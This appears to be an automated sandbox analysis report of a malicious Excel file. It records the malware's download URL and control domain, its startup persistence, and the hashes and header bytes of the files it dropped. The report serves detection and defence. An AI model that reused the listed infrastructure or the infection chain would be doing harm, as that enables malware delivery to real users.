http://www.%s.comPA0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://tempuri.org/ProductDataSet1.xsd0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.168.36
truefalse
    		high
    e-businessloader.mywire.org
    		194.5.98.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://13.238.159.178/truth/vbc.exetrue
      • Avira URL Cloud: safe
      		unknown
      https://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.windows.com/pctv.sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpfalse
          		high
          http://investor.msn.comvbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpfalse
            		high
            http://ns.adobe.c/svbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.520252057.000000000518C000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.msnbc.com/news/ticker.txtvbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpfalse
              		high
              http://tempuri.org/login2DataSet.xsdsys30.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.entrust.net/server1.crl0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                		high
                http://ocsp.entrust.net03vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://tempuri.org/ProductDataSet.xsdsys30.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://n.fvbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://tempuri.org/PendingProList.xsdsys30.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.hotmail.com/oevbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpfalse
                  		high
                  http://ns.adobedevbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpfalse
                    		high
                    https://www.google.comvbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmpfalse
                      		high
                      http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThevbc.exe, 00000006.00000002.519166195.0000000000D82000.00000020.00020000.sdmp, sys30.exe, 00000007.00000000.503536926.0000000001222000.00000020.00020000.sdmp, sys30.exe, 00000008.00000000.515458135.0000000001222000.00000020.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmpfalse
                        		high
                        http://ns.aovbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://investor.msn.com/vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.google.comsys30.exe, 00000008.00000002.523915323.0000000002A92000.00000004.00000001.sdmpfalse
                            		high
                            http://www.%s.comPAvbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp, sys30.exe, 00000008.00000002.524598460.0000000005BB0000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		low
                            http://ocsp.entrust.net0Dvbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmpfalse
                              		high
                              https://secure.comodo.com/CPS0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                                		high
                                http://crl.entrust.net/2048ca.crl0vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpfalse
                                  		high
                                  http://tempuri.org/ProductDataSet1.xsdsys30.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.217.168.36
                                  		www.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  13.238.159.178
                                  		unknownUnited States
                                  		16509AMAZON-02UStrue
                                  194.5.98.103
                                  		e-businessloader.mywire.orgNetherlands
                                  		208476DANILENKODEfalse

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:483371
                                  Start date:14.09.2021
                                  Start time:21:46:57
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 14m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Enclosed.xlsx
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:30
                                  Number of new started drivers analysed:2
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winXLSX@51/57@23/3
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 1.3% (good quality ratio 1%)
                                  • Quality average: 63.4%
                                  • Quality standard deviation: 34.4%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 242
                                  • Number of non-executed functions: 4
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xlsx
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe
                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 131.253.33.200, 13.107.22.200
                                  • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483371/sample/Enclosed.xlsx

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  21:47:43API Interceptor86x Sleep call for process: EQNEDT32.EXE modified
                                  21:47:48API Interceptor200x Sleep call for process: vbc.exe modified
                                  21:47:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk
                                  21:48:04API Interceptor1717x Sleep call for process: sys30.exe modified
                                  21:48:23API Interceptor2024x Sleep call for process: sys30s.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:downloaded
                                  Size (bytes):667136
                                  Entropy (8bit):6.722731568770937
                                  Encrypted:false
                                  SSDEEP:6144:4kS8lJbCW4cCUDgd35ZFj6uf3wwoBd78yRp+7tjbSaFSZYFFhJk5XkbQEPr3jbDM:J9bB41pZFmw3wwo733gtSsSZCfOkm3l
                                  MD5:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  SHA1:CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826
                                  SHA-256:3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738
                                  SHA-512:08F212F8745A077BC3F0F839A1D7BC008D87D65072D3A2B91C8EE7764C00F25D594D0972CB32EA26931FE3FE9BA205814A45C5B83BA661972A84D54824569B5A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:unknown
                                  IE Cache URL:http://13.238.159.178/truth/vbc.exe
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`...................$...........C... ........@.. ....................................`..................................C..K....`............................................................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................C......H............V......G....y...k........................................... .........%.d...(.....e... .........%.f...(.....g...*..(....*&..(.....*.s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o......,.r...p......(....s....z..+..s..........~.........(.....o......(..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):648132
                                  Entropy (8bit):2.812195854060378
                                  Encrypted:false
                                  SSDEEP:3072:U34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:24UcLe0JOcXuunhqcS
                                  MD5:B13F5C457D230231A208F2987E745125
                                  SHA1:8F04183D640FD9B079F744C7D5516B2306510460
                                  SHA-256:61871A444B8C92B591A7DDC6C56513F3AFAFAF66B8415F0302E875F7712048AE
                                  SHA-512:CE7135E9AD3A19A2F110040ED88761EC758FB66BC5BAC1819165344446F02462580108C45E154596CA934CA1B8D5A2AEB0241653315E27DF7DC3053304556E13
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...../..f.Y.@\.%...../.../.....D./.../.RQt[D./.<./......./.(./.$Qt[D./.<./. ...Id.Y<./.D./. ............d.Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...<./.p./..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398B5F3D.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                  Category:dropped
                                  Size (bytes):14198
                                  Entropy (8bit):7.916688725116637
                                  Encrypted:false
                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A50C9D9.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                  Category:dropped
                                  Size (bytes):7006
                                  Entropy (8bit):7.000232770071406
                                  Encrypted:false
                                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                  MD5:971312D4A6C9BE9B496160215FE59C19
                                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63AD3153.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):6815
                                  Entropy (8bit):7.871668067811304
                                  Encrypted:false
                                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\661AB804.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFFAE51.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                  Category:dropped
                                  Size (bytes):7006
                                  Entropy (8bit):7.000232770071406
                                  Encrypted:false
                                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                  MD5:971312D4A6C9BE9B496160215FE59C19
                                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EBE50B2.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACB7B606.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE70A24F.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                  Category:dropped
                                  Size (bytes):85020
                                  Entropy (8bit):7.2472785111025875
                                  Encrypted:false
